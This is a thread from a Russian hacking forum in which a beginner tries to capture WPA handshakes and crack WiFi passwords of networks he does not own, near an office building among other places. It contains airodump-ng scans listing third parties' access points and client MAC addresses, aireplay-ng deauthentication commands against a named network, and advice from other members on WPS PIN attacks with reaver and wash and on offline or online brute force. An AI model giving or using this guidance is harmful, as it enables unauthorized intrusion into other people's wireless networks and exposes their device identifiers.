Форум АНТИЧАТ - Проблемы с перехватом хендшейка

Страница 1 из 2

Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)

- - Проблемы с перехватом хендшейка (https://forum.antichat.xyz/showthread.php?t=425072)

Василий-Шишкин

11.05.2015 22:14

Добрый вечер.

В первые пробую взломать пороль WiFi, установил ОС Kali Linux, работаю на ноутбуке от Lenovo G50-30.

Прочитал статью по ссылке (тоже на этом форуме), и много других.

Что я делал:

- подключил WiFi адаптер Alfa AWUS036H.

- переключил в режим мониторинга:

[CODE]
Code:
root@kali-Linux:~# airodump-ng mon0

CH 3 ][ Elapsed: 4 s ][ 2015-05-11 19:29

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

BC:F6:85:BF:C0:E6 -59 2 0 0 4 54e WPA CCMP PSK Kira-
10:BF:48:E6:55:18 -70 4 0 0 6 54e WPA2 CCMP PSK Roofl
B0:B2:DC:DC:C5:59 -63 3 0 0 8 54e WPA2 CCMP PSK Archi
D4:21:22:53:CE:65 -76 6 0 0 8 54e WPA2 CCMP PSK MGTS_
B0:B2:DC:DC:C5:58 -67 11 0 0 8 54e WPA2 CCMP PSK Archi
60:A4:4C:DE:45:48 -74 2 0 0 4 54e WPA2 CCMP PSK ASUS
C0:C1:C0:48:76:8F -74 2 0 0 2 54e. WPA2 CCMP PSK Alati
60:A4:4C:A2:B7:F8 -65 2 0 0 13 54e WPA2 CCMP PSK TAGNA
00:14:D1:A5:4A:95 -67 2 0 0 11 54e. WPA2 CCMP PSK SPIDE
D8:50:E6:D7:39:60 -67 12 3 0 6 54e WPA2 CCMP PSK Anako
00:22:15:71:2A:E5 -59 20 3 0 6 54 WPA TKIP PSK WL520
00:1C:F0:3B:C3:05 -66 18 4 1 6 54 . WPA TKIP PSK dlink
C4:6E:1F:D5:AE:8A -71 2 0 0 6 54e. WPA2 CCMP PSK TP-LI
90:E6:BA:F1:6C:30 -57 3 2 0 6 54 WPA2 CCMP PSK proje
00:25:9C:F7:36:85 -53 21 0 0 9 54e. WPA2 CCMP PSK Port
D4:21:22:99:45:61 -75 3 0 0 1 54e WPA2 CCMP PSK MGTS_
00:17:9A:84:FD:45 -71 3 0 0 3 54 . WPA2 CCMP PSK 2b4A9
C2:9F:DB:F7:43:B4 -69 0 3 0 1 -1 OPN

Mister_Bert0ni

11.05.2015 22:23

Цитата:

Сообщение от Василий-Шишкин

Василий-Шишкин said:
↑
В чем ошибка ума не приложу, весь русские и английские форумы и статьи прочитал и облазил, полностю в ТУПИКЕ.
Заранее благодарен.

Не внимательно читаешь скорее всего раз не понимаешь для чего ты команды вводишь.

Может видео поможет..

Василий-Шишкин

11.05.2015 22:31

на английском возможно, что много пропустил, так как не владею английским на 100%. Поэтому очень даже может быть.

А видео я почти не смотрел, спасибо

Василий-Шишкин

11.05.2015 22:46

Цитата:

Сообщение от Mister_Bert0ni

Mister_Bert0ni said:
↑
Не внимательно читаешь скорее всего раз не понимаешь для чего ты команды вводишь.
Может видео поможет..

т.е. я правельно понимаю, что хендшейк нужен, чтобы взломать с помощью reaver, а если брутом то он вовсе не нужен?

Mister_Bert0ni

11.05.2015 23:13

Цитата:

Сообщение от Василий-Шишкин

Василий-Шишкин said:
↑
т.е. я правельно понимаю, что хендшейк нужен, чтобы взломать с помощью reaver, а если брутом то он вовсе не нужен?

Handshake как раз таки нужен для брута.Что бы проще тебе было понять - Handshake - это момент рукопожатия между точкой и клиентом(момент когда клиент передает пароль точке в шифрованном виде)А брут - это процес перебора(как бы угадать пароль из словаря в котором он может быть) пароля.Если у нас не будет handshake-a то нам не будет что брутит.Понимаешь?

А reaver - это другое кино... REAVER это утилита для перебора ПИНов когда роутер уязвим по протоколу WPS(WIireless Protected Setup).Здесь как раз таки handshake не нужен.В вардрайвинге есть такой приоритет взлома,что если есть WPS то сначала ломается он а аж потом брут если первый этап не даст результатов так как WPS ломается быстрее и проще.А прежде чем ломать WPS стоит проверить наличия ПИНа от роутера на наличие в списке стандартных пинов http://k0derz.ru/база-wps-pin-кодов/.

Проверить есть ли на роутере WPS можно утилитой wash в Kali Linux на пример так:

Код:

Code:

wash -i mon0

Василий-Шишкин

12.05.2015 07:47

Цитата:

Сообщение от Mister_Bert0ni

Mister_Bert0ni said:
↑
Handshake как раз таки нужен для брута.Что бы проще тебе было понять - Handshake - это момент рукопожатия между точкой и клиентом(момент когда клиент передает пароль точке в шифрованном виде)А брут - это процес перебора(как бы угадать пароль из словаря в котором он может быть) пароля.Если у нас не будет handshake-a то нам не будет что брутит.Понимаешь?
А reaver - это другое кино... REAVER это утилита для перебора ПИНов когда Ротер уязвим по протоколу WPS(WIireless Protected Setup).Здесь как раз таки handshake не нужен.В вардрайвинге есть такой приоритет взлома,что если есть WPS то сначала ломается он а аж потом брут если первый этап не даст результатов так как WPS ломается быстрее и проще.А прежде чем ломать WPS стоит проверить наличия ПИНа от роутера на наличие в списке стандартных пинов
http://k0derz.ru/база-wps-pin-кодов/
.
Проверить есть ли на роутере WPS можно утилитой wash в Kali Linux на пример так:

Код:

Code:

wash -i mon0

И опять же у этого парня (девушки) в видео сразу поймал клиентов, которые подключены к тому или иному wifi -ю. А у меня этого не происходит. Вот поэтому я сюда и обратился. Как это исправить?

BabaDook

12.05.2015 08:17

Цитата:

Сообщение от Василий-Шишкин

нет не правельно

Василий-Шишкин

12.05.2015 08:20

Вот сегодня вышел "прогуляться" и около офисного здания попробовал снова, что получится:

Код:

Code:

CH  4 ][ Elapsed: 44 s ][ 2015-05-12 07:13 ][ display sta only



BSSID  STATION  PWR  Rate  Lost  Frames  Probe



(not associated)  5C:93:A2:9E:E2:07  -67  0 - 1  0  1

(not associated)  9C:AD:97:4D:37:19  0  0 - 1  0  13

(not associated)  00:C0:CA:81:EC:0E  4  0 - 1  0  4

(not associated)  1C:7B:21:97:E5:A2  -57  0 - 1  0  5

(not associated)  C0:64:C6:4F:F2:B0  -63  0 - 1  134  15  HOME_5_GHz,ASUS_5G,33RUS

(not associated)  58:12:43:BB:AD:90  -65  0 - 1  0  2

(not associated)  AC:22:0B:21:62:BB  -63  0 - 5  3622  593  AVK119,ASUS,HP-Print-32-Deskjet 3520 series,default,Smart_box-CEB676_guest,onlime

(not associated)  34:08:04:32:FF:2A  -67  0 - 1  0  2

(not associated)  00:1F:3C:B1:EB:0E  -67  0 - 1  0  5

(not associated)  48:59:29:F6:D3:1E  -67  0 - 1  0  3

(not associated)  74:2F:68:83:F1:60  -69  0 - 1  32  9

(not associated)  90:A4:DE:5E:ED:47  -69  0 - 1  0  4

(not associated)  C4:42:02:E1:55:CD  -69  0 - 1  0  15  KafeBryans,�.�.ТС-684496,�.�.ТС-684496,�.�.ТС-684496,�.�.ТС-684496,�.�.Т

(not associated)  88:63:DF:2A:FE:0E  -69  0 - 1  0  1  slnkv

(not associated)  BC:F5:AC:9E:9A:D9  -69  0 - 1  0  1

(not associated)  00:26:C7:03:22:B8  -69  0 - 1  0  10

(not associated)  38:63:F6:06:30:52  -71  0 - 1  0  3

(not associated)  B0:65:BD:99:BD:AC  -71  0 - 1  0  4  mwmp,wmp

(not associated)  00:25:D3:6B:0B:CF  -71  0 - 1  0  1

(not associated)  F0:7B:CB:95:48:79  -71  0 - 1  0  1  dlink

(not associated)  68:17:29:F1:A7:B1  -71  0 - 1  35  4

(not associated)  C4:85:08:3C:AD:07  -71  0 - 1  76  2  Normanykt

(not associated)  DC:85:DE:8A:A5:31  -73  0 - 1  34  6

(not associated)  68:94:23:24:92:9A  -63  0 - 1  96  48  AP-SGP

(not associated)  9C:2A:70:1A:E2:89  -73  0 - 1  38  12  Artur

(not associated)  F0:F6:1C:2D:FE:87  -73  0 - 1  0  1

(not associated)  40:0E:85:3A:72:E3  -73  0 - 1  0  1  sshipulin_guest

(not associated)  1C:B0:94:C7:4D:8A  -73  0 - 1  0  5  TRENDnet651

(not associated)  50:B7:C3:DE:87:2D  -75  0 - 1  0  1

(not associated)  7C:E9:D3:B0:05:16  -75  0 - 1  91  16  AP-SGP



CH  1 ][ Elapsed: 48 s ][ 2015-05-12 07:13 ][ display sta only



BSSID  STATION  PWR  Rate  Lost  Frames  Probe



(not associated)  18:F4:6A:33:37:83  -67  0 - 1  0  1

(not associated)  00:C0:CA:81:EC:0E  4  0 - 1  0  4

(not associated)  9C:AD:97:4D:37:19  0  0 - 1  0  13

(not associated)  1C:7B:21:97:E5:A2  -57  0 - 1  0  5

(not associated)  C0:64:C6:4F:F2:B0  -63  0 - 1  0  15  HOME_5_GHz,

(not associated)  68:94:23:24:92:9A  -63  0 - 1  0  48  AP-SGP

(not associated)  00:E1:85:09:01:1C  -65  0 - 1  2  3

(not associated)  58:12:43:BB:AD:90  -65  0 - 1  0  2

(not associated)  AC:22:0B:21:62:BB  -65  0 - 5  1873  679  AVK119,ASUS

(not associated)  5C:93:A2:9E:E2:07  -67  0 - 1  0  1

(not associated)  34:08:04:32:FF:2A  -67  0 - 1  0  2

(not associated)  00:1F:3C:B1:EB:0E  -67  0 - 1  0  5

(not associated)  48:59:29:F6:D3:1E  -67  0 - 1  0  3

(not associated)  74:2F:68:83:F1:60  -69  0 - 1  0  9

(not associated)  90:A4:DE:5E:ED:47  -69  0 - 1  0  4

(not associated)  C4:42:02:E1:55:CD  -69  0 - 1  0  15  KafeBryans,

(not associated)  88:63:DF:2A:FE:0E  -69  0 - 1  0  1  slnkv

(not associated)  BC:F5:AC:9E:9A:D9  -69  0 - 1  0  1



CH 13 ][ Elapsed: 1 min ][ 2015-05-12 07:14 ][ display sta only



BSSID  STATION  PWR  Rate  Lost  Frames  Probe



(not associated)  9C:AD:97:4D:37:19  0  0 - 1  0  26

(not associated)  00:C0:CA:81:EC:0E  0  0 - 1  0  8

(not associated)  1C:7B:21:97:E5:A2  -57  0 - 1  0  5

(not associated)  00:E1:85:09:01:1C  -61  0 - 1  51  5

(not associated)  C0:64:C6:4F:F2:B0  -63  0 - 1  0  15  HOME_5_GHz,ASUS_5G,33RUS

(not associated)  1C:B0:94:C7:4D:8A  -63  0 - 1  0  8  TRENDnet651

(not associated)  AC:22:0B:21:62:BB  -67  0 - 5  1128  987  AVK119,ASUS,HP-Print-32-Deskjet 3520 series,default,Smart_box-CEB676_guest,onlime

(not associated)  58:12:43:BB:AD:90  -65  0 - 1  0  2

(not associated)  18:F4:6A:33:37:83  -67  0 - 1  0  1

(not associated)  5C:93:A2:9E:E2:07  -67  0 - 1  0  1

(not associated)  34:08:04:32:FF:2A  -67  0 - 1  0  2

(not associated)  00:1F:3C:B1:EB:0E  -67  0 - 1  0  5

(not associated)  48:59:29:F6:D3:1E  -67  0 - 1  0  3

(not associated)  68:94:23:24:92:9A  -67  0 - 1  30  61  AP-SGP

(not associated)  00:26:C7:03:22:B8  -67  0 - 1  30  14

(not associated)  9C:2A:70:1A:E2:89  -67  0 - 1  80  20  Artur

(not associated)  74:2F:68:83:F1:60  -67  0 - 1  16  16

(not associated)  B4:52:7E:92:A2:49  -69  0 - 1  0  1

(not associated)  90:A4:DE:5E:ED:47  -69  0 - 1  0  4

(not associated)  C4:42:02:E1:55:CD  -69  0 - 1  0  15  KafeBryans,�.�.ТС-684496,�.�.ТС-684496,�.�.ТС-684496,�.�.ТС-684496,�.�.Т

(not associated)  88:63:DF:2A:FE:0E  -69  0 - 1  0  1  slnkv

(not associated)  00:26:AB:61:C2:54  -69  0 - 1  42  33  Screen

(not associated)  B0:5C:E5:C2:0E:24  -71  0 - 1  0  1

(not associated)  00:08:CA:28:82:C1  -71  0 - 1  0  6

(not associated)  1C:4B:D6:DE:76:AA  -71  0 - 1  0  3

(not associated)  38:63:F6:06:30:52  -71  0 - 1  0  3

(not associated)  B0:65:BD:99:BD:AC  -71  0 - 1  0  4  mwmp,wmp

(not associated)  00:25:D3:6B:0B:CF  -71  0 - 1  0  1

(not associated)  F0:7B:CB:95:48:79  -71  0 - 1  0  1  dlink

(not associated)  68:17:29:F1:A7:B1  -71  0 - 1  0  4

снова тоже самое 1000-и клиентов и ни один человек не подключен к точки доступа. Как так?

Каким образом aireplay-ng будет отключать клиентов, если он их даже не видет, или besside-ng, получается без клиентов у меня нет шансов взломать пороль WiFi?

Василий-Шишкин

12.05.2015 08:22

Цитата:

Сообщение от BabaDook

BabaDook said:
↑
нет не правельно

Спасибо, с этим я уже разобрался, вот с клиентами нет

BabaDook

12.05.2015 08:49

Цитата:

Сообщение от Василий-Шишкин

Василий-Шишкин said:
↑
Спасибо, с этим я уже разобрался, вот с клиентами нет

что с ними не так ?

Василий-Шишкин

12.05.2015 08:59

Одного клиента спустя 2 дня поиска наконец то обнаружил:

Код:

Code:

CH 10 ][ Elapsed: 51 min ][ 2015-05-12 07:45   

   

 BSSID  PWR  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

   

 2C:AB:25:0B:B5:1C  -1  0  0  0  -1  -1     

 B0:B2:DC:88:29:54  -1  0  0  0  -1  -1     

 00:11:24:98:61:E8  -1  0  0  0  -1  -1     

 64:66:B3:53:F9:6C  -1  0  0  0  -1  -1     

 1C:BD:B9:2B:E6:00  -28  3  0  0  6  54e. WPA2 CCMP  PSK  Indiweed   

-------- 20:CF:30:D6:46:DB  -64  34  0  0  12  54e  WPA2 CCMP  PSK  JackVorobey   

 EE:43:F6:03:F5:A8  -53  132  13  0  9  54e  WPA2 CCMP  PSK     

 F4:6D:04:7D:88:07  -58  79  3  0  6  54  WPA2 TKIP  PSK  smirnoff   

 10:FE:ED:4A:3F:E2  -57  124  8  0  4  54e. WPA2 CCMP  PSK  Imgnp   

 00:18:E7:FC:95:80  -57  69  0  0  13  54 . WPA2 CCMP  PSK  gersan3   

 CC:5D:4E:FE:1C:E8  -59  83  0  0  11  54e  WPA2 CCMP  PSK  Gosp   

 EC:43:F6:DD:12:DC  -63  37  1  0  4  54e  WPA2 CCMP  PSK  Keenetic-7833   

 F4:6D:04:C3:B9:14  -60  72  0  0  6  54e  WPA2 CCMP  PSK  Vandam   

 54:A0:50:DD:40:DC  -60  24  2  0  1  54e  WPA2 CCMP  PSK  wifi513   

 10:BF:48:E6:42:AF  -61  47  1  0  6  54e  WPA2 CCMP  PSK  ASUS   

 F8:C0:91:25:A9:88  -61  46  0  0  13  54e  WPA2 CCMP  PSK  Upvel   

 D8:5D:4C:D6:14:92  -63  47  3  0  7  54e. WPA2 CCMP  PSK  FreeWiFi   

 78:24:AF:7E:A3:5C  -64  46  3  0  6  54e  WPA2 CCMP  PSK  ASUS   

 D8:50:E6:AF:48:40  -64  20  3  0  6  54e  WPA2 CCMP  PSK  Olimpiya   

 20:4E:7F:51:4A:FE  -62  75  0  0  3  54e. WPA2 CCMP  PSK  makap   

 14:DA:E9:79:B6:7C  -64  23  0  0  13  54e  OPN  MrBoshi   

 52:68:9D:EA:FD:F0  -65  32  0  0  1  54e. WPA2 CCMP  PSK  10-11b   

 1C:7E:E5:92:EA:6C  -65  6  0  0  1  54e  WPA2 CCMP  PSK  DIR-620 1   

 38:1C:1A:2E:93:E0  -65  25  0  0  6  54e. WPA2 CCMP  MGT  bmstu_student   

 64:70:02:CA:3D:E2  -65  13  0  0  11  54e. WPA2 CCMP  PSK  Service   

 14:DA:E9:F8:FA:A4  -65  4  0  0  13  54e  WPA2 CCMP  PSK  rb1   

 00:23:54:73:99:D2  -66  7  1  0  9  54  WPA2 CCMP  PSK  Asus   

 38:1C:1A:2E:93:E2  -67  21  0  0  6  54e. OPN  bmstu_staff   

 D4:BF:7F:01:78:B8  -67  17  0  0  9  54e  WPA2 CCMP  PSK  514KZ   

 D4:BF:7F:01:B4:48  -67  11  0  0  9  54e  WPA2 CCMP  PSK  PUSSY 



 CH 12 ][ Elapsed: 28 s ][ 2015-05-12 07:45 ][ display sta only   

   

 BSSID  STATION  PWR  Rate  Lost  Frames  Probe   

   

 (not associated)  00:C0:CA:81:EC:0E  0  0 - 1  0  4   

 (not associated)  9C:8E:99:08:14:34  -57  0 - 1  33  37  UI.RU-IU.RU

 (not associated)  88:70:8C:14:8A:B2  -55  0 - 1  5  4   

 (not associated)  A4:EE:57:6F:C7:A3  -55  0 - 1  42  14   

 (not associated)  6C:40:08:DC:81:7F  -57  0 - 1  22  2   

 (not associated)  00:81:6A:3B:4F:81  -63  0 - 1  0  3   

 (not associated)  24:FD:52:B5:2E:CC  -65  0 - 1  0  3   

 (not associated)  24:0A:64:B6:8C:EB  -65  0 - 1  0  7   

 (not associated)  DC:85:DE:25:8B:1A  -67  0 - 1  0  1  ASUS   

 (not associated)  24:0A:64:B1:72:9B  -69  0 - 1  0  1   

 (not associated)  74:F0:6D:75:72:74  -71  0 - 1  0  1   

 (not associated)  94:39:E5:53:A3:F7  -71  0 - 1  49  2   

 20:CF:30:D6:46:DB  9C:AD:97:4D:37:19  0  0 - 1  5  173

Снова пробую перехватить:

Код:

Code:

CH 1 ] [ Elapsed: 33 mins ][ 2015-05-12 07:56   

   

 BSSID  PWR  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

   

 20:CF:30:D6:46:DB  -65  323  0  0  12  54e  WPA2 CCMP  PSK  JackV

   

 BSSID  STATION  PWR  Rate  Lost  Frames  Probe

одновременно пробую отключить клиента :

Код:

Code:

root@kali-Linux:~# aireplay-ng --deauth 5 -a 20:CF:30:D6:46:DB -c 9C:AD:97:4D:37:19 mon0

07:55:13  Waiting for beacon frame (BSSID: 20:CF:30:D6:46:DB) on channel -1

07:55:13  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch

Please specify an ESSID (-e).

Снова не получается.

Василий-Шишкин

12.05.2015 09:03

Цитата:

Сообщение от BabaDook

BabaDook said:
↑
что с ними не так ?

Не могу отключить их пишет:

Код:

Code:

root@kali-Linux:~# aireplay-ng --deauth 5 -a 20:CF:30:D6:46:DB -c 9C:AD:97:4D:37:19 mon0

07:55:13  Waiting for beacon frame (BSSID: 20:CF:30:D6:46:DB) on channel -1

07:55:13  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch

Please specify an ESSID (-e).

если добовляю essid, то:

Код:

Code:

root@kali-Linux:~# aireplay-ng --deauth 5 -e JackVorobey -a 20:CF:30:D6:46:DB -c 9C:AD:97:4D:37:19 mon0

08:02:06  Waiting for beacon frame (BSSID: 20:CF:30:D6:46:DB) on channel -1

08:02:06  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch

BabaDook

12.05.2015 09:15

--ignore-negative-one для кого эта строчка?

Василий-Шишкин

12.05.2015 09:32

Цитата:

Сообщение от BabaDook

BabaDook said:
↑
--ignore-negative-one для кого эта строчка?

Это и есть мой вопрос, почему он не хочет отключить клиента, а выдает какое-то "Г"?

--ignore-negative-one - сам не знаю что такое

вот что выдает help к команде aireplay-ng:

Код:

Code:

root@kali-Linux:~# aireplay-ng --help



  Aireplay-ng 1.2 rc1 - (C) 2006-2013 Thomas d'Otreppe

  http://www.aircrack-ng.org



  usage: aireplay-ng  



  Filter options:



  -b bssid  : MAC address, Access Point

  -d dmac  : MAC address, Destination

  -s smac  : MAC address, Source

  -m len  : minimum packet length

  -n len  : maximum packet length

  -u type  : frame control, type  field

  -v subt  : frame control, subtype field

  -t tods  : frame control, To  DS bit

  -f fromds : frame control, From  DS bit

  -w iswep  : frame control, WEP  bit

  -D  : disable AP detection



  Replay options:



  -x nbpps  : number of packets per second

  -p fctrl  : set frame control word (hex)

  -a bssid  : set Access Point MAC address

  -c dmac  : set Destination  MAC address

  -h smac  : set Source  MAC address

  -g value  : change ring buffer size (default: 8)

  -F  : choose first matching packet



  Fakeauth attack options:



  -e essid  : set target AP SSID

  -o npckts : number of packets per burst (0=auto, default: 1)

  -q sec  : seconds between keep-alives

  -Q  : send reassociation requests

  -y prga  : keystream for shared key auth

  -T n  : exit after retry fake auth request n time



  Arp Replay attack options:



  -j  : inject FromDS packets



  Fragmentation attack options:



  -k IP  : set destination IP in fragments

  -l IP  : set source IP in fragments



  Test attack options:



  -B  : activates the bitrate test



  Source options:



  -i iface  : capture packets from this interface

  -r file  : extract packets from this pcap file



  Miscellaneous options:



  -R  : disable /dev/rtc usage

  --ignore-negative-one : if the interface's channel can't be determined,

  ignore the mismatch, needed for unpatched cfg80211



  Attack modes (numbers can still be used):



  --deauth  count : deauthenticate 1 or all stations (-0)

  --fakeauth  delay : fake authentication with AP (-1)

  --interactive  : interactive frame selection (-2)

  --arpreplay  : standard ARP-request replay (-3)

  --chopchop  : decrypt/chopchop WEP packet (-4)

  --fragment  : generates valid keystream  (-5)

  --caffe-latte  : query a client for new IVs  (-6)

  --cfrag  : fragments against a client  (-7)

  --migmode  : attacks WPA migration mode  (-8)

  --test  : tests injection and quality (-9)



  --help  : Displays this usage screen

почти в самом конце

Цитата:

Сообщение от None

--ignore-negative-one : if the interface's channel can't be determined,
ignore the mismatch, needed for unpatched cfg80211

Как можно исправить?

BabaDook

12.05.2015 09:33

Цитата:

Сообщение от Василий-Шишкин

Василий-Шишкин said:
↑
Это и есть мой вопрос, почему он не хочет отключить клиента, а выдает какое-то "Г"?
--ignore-negative-one - сам не знаю что такое

под твоей темой специально для тебя скопировал статью

Василий-Шишкин

12.05.2015 09:41

Цитата:

Сообщение от BabaDook

BabaDook said:
↑
под твоей темой специально для тебя скопировал статью

Я недавно в Античат, не знаю где это "под темой" можно ссылку или просто вставить(как сообщение)?

Василий-Шишкин

12.05.2015 09:50

Цитата:

Сообщение от Mister_Bert0ni

Mister_Bert0ni said:
↑
Handshake как раз таки нужен для брута.Что бы проще тебе было понять - Handshake - это момент рукопожатия между точкой и клиентом(момент когда клиент передает пароль точке в шифрованном виде)А брут - это процес перебора(как бы угадать пароль из словаря в котором он может быть) пароля.Если у нас не будет handshake-a то нам не будет что брутит.Понимаешь?
А reaver - это другое кино... REAVER это утилита для перебора ПИНов когда роутер уязвим по протоколу WPS(WIireless Protected Setup).Здесь как раз таки handshake не нужен.В вардрайвинге есть такой приоритет взлома,что если есть WPS то сначала ломается он а аж потом брут если первый этап не даст результатов так как WPS ломается быстрее и проще.А прежде чем ломать WPS стоит проверить наличия ПИНа от роутера на наличие в списке стандартных пинов
http://k0derz.ru/база-wps-pin-кодов/
.
Проверить есть ли на роутере WPS можно утилитой wash в Kali Linux на пример так:

Код:

Code:

wash -i mon0

Если я перехватил отличный хендшейк, я могу например брутить его дома или мне обязательно быть в зоне действия роутера.

Спрашиваю, потому что Вы говорите брутить хендшейк, тогда зачем соединение с роутером, по идее можно его про брутить узнать пороль и просто приходить на то место и подключаться к нему, можно так?

Если так, то было б велеколепно я с планшетным ноутбуком по перехватываю хендшейки, а дома с "крутой" быстрой и мощной видеокартой про брутю все хендшейки, а с ноутбуком я 10 лет взламывать буду)

BabaDook

12.05.2015 09:52

Цитата:

Сообщение от Василий-Шишкин

Василий-Шишкин said:
↑
Если я перехватил отличный хендшейк, я могу например брутить его дома или мне обязательно быть в зоне действия роутера.
Спрашиваю, потому что Вы говорите брутить хендшейк, тогда зачем соединение с роутером, по идее можно его про брутить узнать пороль и просто приходить на то место и подключаться к нему, можно так?
Если так, то было б велеколепно я с планшетным ноутбуком по перехватываю хендшейки, а дома с "крутой" быстрой и мощной видеокартой про брутю все хендшейки, а с ноутбуком я 10 лет взламывать буду)

Где хочешь там и брути, можешь в инете брутить, есть спец сервисы

Василий-Шишкин

12.05.2015 09:55

Цитата:

Сообщение от BabaDook

BabaDook said:
↑
Где хочешь там и брути, можешь в инете брутить, есть спец сервисы

Это очень хорошая информация, только хендшейк перехватить не получается.

Вы говорили про статью, подскажите, где она.

BabaDook

12.05.2015 09:56

Цитата:

Сообщение от Василий-Шишкин

Василий-Шишкин said:
↑
Это очень хорошая информация, только хендшейк перехватить не получается.
Вы говорили про статью, подскажите, где она.

/threads/425082/

Василий-Шишкин

12.05.2015 09:57

Цитата:

Сообщение от BabaDook

BabaDook said:
↑
/threads/425082/

) это вы уже писали, проблема в том, что я не знаю где это, так лучше, спасибо

А понял, где это под моей темой, в списке всех тем, сначала понял в моей теме под ней, поэтому не мог найти

Василий-Шишкин

12.05.2015 10:08

В той статье опять же сразу есть клиенты а у меня их нет!

Код:

Code:

CH 12 ][ Elapsed: 1 hour 10 min ][ 2015-05-12 09:07 ][ fixed channel mon0: -1   

   

 BSSID  PWR RXQ  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH E

   

 20:CF:30:D6:46:DB  -40  58  166  0  0  12  54e  WPA2 CCMP  PSK  J

   

 BSSID  STATION  PWR  Rate  Lost  Frames  Probe

Видите, там "Data" написано 0.

Нет ни кого. И так на всех.

BabaDook

12.05.2015 10:10

Цитата:

Сообщение от Василий-Шишкин

Василий-Шишкин said:
↑
В той статье опять же сразу есть клиенты а у меня их нет!

Код:

Code:

CH 12 ][ Elapsed: 1 hour 10 min ][ 2015-05-12 09:07 ][ fixed channel mon0: -1  

  

BSSID  PWR RXQ  Beacons  #Data, #/s  CH  MB  ENC  CIPHER AUTH E

  

20:CF:30:D6:46:DB  -40  58  166  0  0  12  54e  WPA2 CCMP  PSK  J

  

BSSID  STATION  PWR  Rate  Lost  Frames  Probe

Видите, там "Data" написано 0.
Нет ни кого. И так на всех.

тогда ты не перехватишь

Василий-Шишкин

12.05.2015 10:10

Цитата:

Сообщение от BabaDook

BabaDook said:
↑
тогда ты не перехватишь

в смысле почему? Я одновремено пытался отключить клиента, который раннее подключался к ней

Василий-Шишкин

12.05.2015 10:15

Код:

Code:

CH  4 ][ Elapsed: 1 min ][ 2015-05-12 09:13 ][ display sta only 

 

BSSID  STATION  PWR  Rate  Lost  Frames  Probe 

 

------ (not associated)  9C:AD:97:4D:37:19  0  0 - 1  0  13 

(not associated)  00:C0:CA:81:EC:0E  -47  0 - 1  0  14 

(not associated)  A4:EE:57:6F:C7:A3  -55  0 - 1  42  37 

(not associated)  A0:EC:80:FC:5C:06  -57  0 - 1  0  6 

(not associated)  EC:0E:C4:22:7D:BF  -59  0 - 1  0  2 

(not associated)  40:30:04:93:26:14  -59  0 - 1  0  4 

(not associated)  18:67:B0:7D:29:B3  -61  0 - 1  49  21  ������,Zyubin,wi-fi 

(not associated)  88:9F:FA:04:E4:D7  -61  0 - 1  0  4  1q2w3e4r 

(not associated)  E0:CB:EE:3F:8E:87  -61  0 - 1  0  1 

(not associated)  9C:8E:99:08:14:34  -51  0 - 1  18  89  UI.RU-IU.RU 

(not associated)  A8:96:8A:8F:01:FA  -65  0 - 1  0  4 

(not associated)  60:21:C0:80:A1:D4  -65  0 - 1  0  2 

(not associated)  18:67:B0:81:6D:05  -65  0 - 1  0  3  514KZ 

(not associated)  74:E1:B6:C3:88:82  -67  0 - 1  0  2  DLink 

(not associated)  68:17:29:EE:40:B7  -67  0 - 1  0  1 

(not associated)  CC:3A:61:EA:D6:51  -67  0 - 1  0  5 

(not associated)  CA:48:E9:2F:54:0B  -67  0 - 1  0  2 

(not associated)  74:F0:6D:75:72:74  -67  0 - 1  0  2 

(not associated)  00:26:82:65:8F:91  -65  0 - 1  30  24 

(not associated)  A4:C3:61:58:30:58  -67  0 - 1  0  3 

(not associated)  DC:85:DE:25:8B:1A  -67  0 - 1  0  2  ASUS 

(not associated)  40:2C:F4:02:19:EE  -67  0 - 1  0  1 

(not associated)  44:6D:57:87:BF:7B  -67  0 - 1  0  7 

(not associated)  50:B7:C3:DE:3A:EB  -69  0 - 1  0  7 

(not associated)  9C:A9:E4:B8:64:C4  -69  0 - 1  0  1 

(not associated)  20:02:AF:30:82:4C  -69  0 - 1  0  7 

(not associated)  48:5D:60:88:2C:68  -69  0 - 1  0  1 

(not associated)  34:23:BA:4C:D8:94  -69  0 - 1  0  9 

(not associated)  74:F0:6D:92:2C:D2  -69  0 - 1  0  1 

(not associated)  8C:FA:BA:B8:44:9B  -69  0 - 1  0  2

Первый самый, он был раньше подключен, только вот инетресно почему теперь мой ноутбук не может определить, к чему он подключен, не сидит он же без инета(клиент)

BabaDook

12.05.2015 10:28

что -то ты не то делаешь

Василий-Шишкин

12.05.2015 11:43

Цитата:

Сообщение от BabaDook

BabaDook said:
↑
что -то ты не то делаешь

Хорошее замечание, для этой цели я написал свой вопрос.

BabaDook

12.05.2015 11:55

пиши команды которые выполняешь , то что я вижу ты никак не поймаешь его

Василий-Шишкин

12.05.2015 12:04

Цитата:

Сообщение от BabaDook

BabaDook said:
↑
пиши команды которые выполняешь , то что я вижу ты никак не поймаешь его

Самое самое начало. Там вроде я все описал, или вам надо что-то еще . Скажите, какие команды вам ещё нужны, по моему то что я описал то я и делал.

BabaDook

12.05.2015 12:27

Цитата:

Сообщение от Василий-Шишкин

Василий-Шишкин said:
↑

Код:

Code:

CH  4 ][ Elapsed: 1 min ][ 2015-05-12 09:13 ][ display sta only



BSSID  STATION  PWR  Rate  Lost  Frames  Probe



------ (not associated)  9C:AD:97:4D:37:19  0  0 - 1  0  13

(not associated)  00:C0:CA:81:EC:0E  -47  0 - 1  0  14

(not associated)  A4:EE:57:6F:C7:A3  -55  0 - 1  42  37

(not associated)  A0:EC:80:FC:5C:06  -57  0 - 1  0  6

(not associated)  EC:0E:C4:22:7D:BF  -59  0 - 1  0  2

(not associated)  40:30:04:93:26:14  -59  0 - 1  0  4

(not associated)  18:67:B0:7D:29:B3  -61  0 - 1  49  21  ������,Zyubin,wi-fi

(not associated)  88:9F:FA:04:E4:D7  -61  0 - 1  0  4  1q2w3e4r

(not associated)  E0:CB:EE:3F:8E:87  -61  0 - 1  0  1

(not associated)  9C:8E:99:08:14:34  -51  0 - 1  18  89  UI.RU-IU.RU

